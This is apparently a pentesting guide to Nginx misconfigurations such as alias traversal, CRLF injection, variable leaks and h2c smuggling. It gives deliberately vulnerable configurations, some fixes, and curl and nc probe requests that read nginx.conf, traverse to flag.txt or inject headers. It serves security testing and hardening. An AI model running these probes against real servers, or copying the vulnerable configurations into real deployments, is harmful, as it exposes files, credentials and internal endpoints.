Nginx


Missing root location

server {
        root /etc/nginx;

        location /hello.txt {
                try_files $uri $uri/ =404;
                proxy_pass http://127.0.0.1:8080/;
        }
}

The root directive specifies the root folder for Nginx. In the above example, the root folder is /etc/nginx which means that we can reach files within that folder. The above configuration does not have a location for / (location / {...}), only for /hello.txt. Because of this, the root directive will be globally set, meaning that requests to / will take you to the local path /etc/nginx.

A request as simple as GET /nginx.conf would reveal the contents of the Nginx configuration file stored in /etc/nginx/nginx.conf. If the root is set to /etc, a GET request to /nginx/nginx.conf would reveal the configuration file. In some cases it is possible to reach other configuration files, access-logs and even encrypted credentials for HTTP basic authentication.
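
As a quick check (the hostname below is purely illustrative), request well-known file names under the exposed root:

# With root /etc/nginx and no location / block, files under /etc/nginx are reachable from the web root
curl http://target.example/nginx.conf
curl http://target.example/conf.d/default.conf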

Alias LFI Misconfiguration

Inside the Nginx configuration look at the "location" statements; if one of them looks like:

location /imgs { 
    alias /path/images/; 
}

There is an LFI vulnerability because a request to:

/imgs../flag.txt

is translated by Nginx to:

/path/images/../flag.txt

The correct configuration would be:

location /imgs/ { 
    alias /path/images/; 
}

So, if you find an Nginx server, you should check for this vulnerability. You can also spot it when a files/directories brute force behaves strangely.
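
A quick manual check against the example above (the hostname is illustrative; /imgs and flag.txt come from the snippet):

# --path-as-is keeps curl from normalizing the ../ sequence before sending it
curl --path-as-is http://target.example/imgs../flag.txt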

More info: https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/

Acunetix tests:

alias../ => HTTP status code 403
alias.../ => HTTP status code 404
alias../../ => HTTP status code 403
alias../../../../../../../../../../../ => HTTP status code 400
alias../ => HTTP status code 403

Unsafe variable use

An example of a vulnerable Nginx configuration is:

location / {
  return 302 https://example.com$uri;
}

The new line characters for HTTP requests are \r (Carriage Return) and \n (Line Feed), and their URL-encoded representation is %0d%0a. When these characters are included in a request like http://localhost/%0d%0aDetectify:%20clrf to a server with this misconfiguration, the server will respond with a new header named Detectify, since the $uri variable contains the URL-decoded new line characters.
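
A minimal reproduction with curl, assuming the vulnerable location / above is reachable on localhost:

curl -i 'http://localhost/%0d%0aDetectify:%20clrf'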

HTTP/1.1 302 Moved Temporarily
Server: nginx/1.19.3
Content-Type: text/html
Content-Length: 145
Connection: keep-alive
Location: https://example.com/
Detectify: clrf

Learn more about the risks of CRLF injection and response splitting at https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/.

Any variable

In some cases, user-supplied data can be treated as an Nginx variable. It's unclear why this may be happening, but it's not that uncommon or easy to test for, as seen in this H1 report. If we search for the error message, we can see that it is found in the SSI filter module, thus revealing that this is due to SSI.

One way to test for this is to set a referer header value:

$ curl -H 'Referer: bar' 'http://localhost/foo$http_referer' | grep foobar

We scanned for this misconfiguration and found several instances where a user could print the value of Nginx variables. The number of found vulnerable instances has declined which could indicate that this was patched.
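
If the reflection works, other built-in Nginx variables can be leaked the same way (the host is illustrative, and whether each variable gets expanded depends on the instance):

curl 'http://localhost/foo$document_root'   # may reflect the configured document root path
curl 'http://localhost/foo$hostname'        # may reflect the internal hostname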

Raw backend response reading

With Nginx's proxy_pass, there's the possibility to intercept errors and HTTP headers created by the backend. This is very useful if you want to hide internal error messages and headers so they are instead handled by Nginx. Nginx will automatically serve a custom error page if the backend answers with one. But what if Nginx does not understand that it's an HTTP response?

If a client sends an invalid HTTP request to Nginx, that request will be forwarded as-is to the backend, and the backend will answer with its raw content. Then, Nginx won't understand the invalid HTTP response and will just forward it to the client. Imagine a uWSGI application like this:

def application(environ, start_response):
    start_response('500 Error', [('Content-Type', 'text/html'),
                                 ('Secret-Header', 'secret-info')])
    return [b"Secret info, should not be visible!"]

And with the following directives in Nginx:

http {
   error_page 500 /html/error.html;
   proxy_intercept_errors on;
   proxy_hide_header Secret-Header;
}

proxy_intercept_errors will serve a custom response if the backend has a response status greater than 300. In our uWSGI application above, we will send a 500 Error which would be intercepted by Nginx.

proxy_hide_header is pretty much self-explanatory; it will hide any specified HTTP header from the client.

If we send a normal GET request, Nginx will return:

HTTP/1.1 500 Internal Server Error
Server: nginx/1.10.3
Content-Type: text/html
Content-Length: 34
Connection: close

But if we send an invalid HTTP request, such as:

GET /? XTTP/1.1
Host: 127.0.0.1
Connection: close

We will get the following response:

XTTP/1.1 500 Error
Content-Type: text/html
Secret-Header: secret-info

Secret info, should not be visible!
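
You can send such a malformed request with a raw TCP client, for example (host and port are illustrative):

printf 'GET /? XTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: close\r\n\r\n' | nc target.example 80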

merge_slashes set to off

The merge_slashes directive is set to "on" by default, which is a mechanism that compresses two or more forward slashes into one, so /// becomes /. If Nginx is used as a reverse proxy and the proxied application is vulnerable to local file inclusion, using extra slashes in the request could leave room to exploit it. This is described in detail by Danny Robinson and Rotem Bar.
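
In the configuration this is just one directive in the http or server context; a minimal sketch (the backend below is an assumption used for illustration):

server {
    merge_slashes off;                   # multiple slashes are no longer collapsed into one
    location / {
        proxy_pass http://backend:8080;  # the extra slashes reach the backend unchanged
    }
}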

We found 33 Nginx configuration files with merge_slashes set to “off”.

default is not specified for map directive

A common case is when map is used for some kind of authorization control. A simplified example could look like:

http {
...
    map $uri $mappocallow {
        /map-poc/private 0;
        /map-poc/secret 0;
        /map-poc/public 1;
    }
...
}
server {
...
    location /map-poc {
        if ($mappocallow = 0) {return 403;}
        return 200 "Hello. It is private area: $mappocallow";
    }
...
}

According to the manual:

default value
sets the resulting value if the source value matches none of the specified variants. When default is not specified, the default resulting value will be an empty string.

It is easy to forget about the default value, so an attacker can bypass this "authorization control" simply by accessing a non-existent entry inside /map-poc, such as https://targethost.com/map-poc/another-private-area.
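
The fix is to declare an explicit default inside the map block, so that unknown URIs fall into the deny branch:

map $uri $mappocallow {
    default 0;
    /map-poc/private 0;
    /map-poc/secret 0;
    /map-poc/public 1;
}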

DNS Spoofing Nginx

According to this post: http://blog.zorinaq.com/nginx-resolver-vulns/, it might be possible to spoof DNS records served to Nginx if you know which DNS server Nginx is using (and you can somehow intercept the communication, so this doesn't apply if 127.0.0.1 is used) and which domain it is resolving.

Nginx can specify a DNS server to use with:

resolver     8.8.8.8;
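
Note that the resolver is only consulted when Nginx has to resolve a name at runtime, typically when proxy_pass uses a variable. A sketch of such a setup (the resolver address and backend name are illustrative):

resolver 192.168.1.53;                   # DNS server whose answers could be spoofed if the traffic can be intercepted
location / {
    set $backend "internal-api.local";
    proxy_pass http://$backend;          # resolved through the resolver on each request
}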

proxy_pass and internal directives

The proxy_pass directive can be used to redirect requests internally to other servers, internal or external.
The internal directive is used to tell Nginx that the location can only be reached via internal redirects, never directly by external clients.

The use of these directives isn't a vulnerability by itself, but you should check how they are configured.
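
A typical combination to review looks like this (backend address and paths are illustrative):

location /api/ {
    proxy_pass http://10.0.0.5:8080/;    # requests to /api/... are forwarded to an internal server
}

location /private/ {
    internal;                            # only reachable via internal redirects (e.g. X-Accel-Redirect), not directly
    alias /var/www/private/;
}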

proxy_set_header Upgrade & Connection

If the Nginx server is configured to pass the Upgrade and Connection headers, an h2c Smuggling attack can be performed to access protected/internal endpoints.

{% hint style="danger" %} This vulnerability would allow an attacker to establish a direct connection with the proxy_pass endpoint (http://backend:9999 in this case) whose content is not going to be checked by Nginx. {% endhint %}

Example of vulnerable configuration to steal /flag from here:

server {
    listen       443 ssl;
    server_name  localhost;

    ssl_certificate       /usr/local/nginx/conf/cert.pem;
    ssl_certificate_key   /usr/local/nginx/conf/privkey.pem;

    location / {
     proxy_pass http://backend:9999;
     proxy_http_version 1.1;
     proxy_set_header Upgrade $http_upgrade;
     proxy_set_header Connection $http_connection;
    }

    location /flag {
     deny all;
    }
}

{% hint style="warning" %} Note that even if the proxy_pass was pointing to a specific path such as http://backend:9999/socket.io the connection will be stablished with http://backend:9999 so you can contact any other path inside that internal endpoint. So it doesn't matter if a path is specified in the URL of proxy_pass. {% endhint %}

Try it yourself

Detectify has created a GitHub repository where you can use Docker to set up your own vulnerable Nginx test server with some of the misconfigurations discussed in this article and try finding them yourself!

https://github.com/detectify/vulnerable-nginx

Static Analyzer tools

GIXY

Gixy is a tool to analyze Nginx configuration. The main goal of Gixy is to prevent security misconfiguration and automate flaw detection.
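
A quick way to run it (the installation method and configuration path may differ on the target):

pip install gixy
gixy /etc/nginx/nginx.conf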

Nginxpwner

Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulnerabilities.
